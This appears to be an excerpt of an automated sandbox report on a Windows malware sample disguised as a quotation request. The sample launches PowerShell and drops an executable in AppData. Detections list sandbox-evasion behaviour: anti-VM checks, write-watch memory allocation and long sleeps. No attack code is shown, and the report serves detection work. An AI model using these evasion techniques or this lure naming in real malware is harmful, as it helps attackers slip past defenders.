Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIADAP.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIADAP.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIADAP.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NuDUTBObHpKADz.exe PID: 7428, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 1530000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 30B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 2E00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 7E30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 8E30000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 8FE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 9FE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 1620000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 30D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Memory allocated: 50D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 1110000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 2F80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 2DC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 77D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 87D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 8960000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 9960000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 2690000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 2820000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Memory allocated: 4820000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599874 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599655 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599326 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599219 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599107 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 598015 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597797 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597687 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597578 Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Thread delayed: delay time: 597469 Jump to behavior
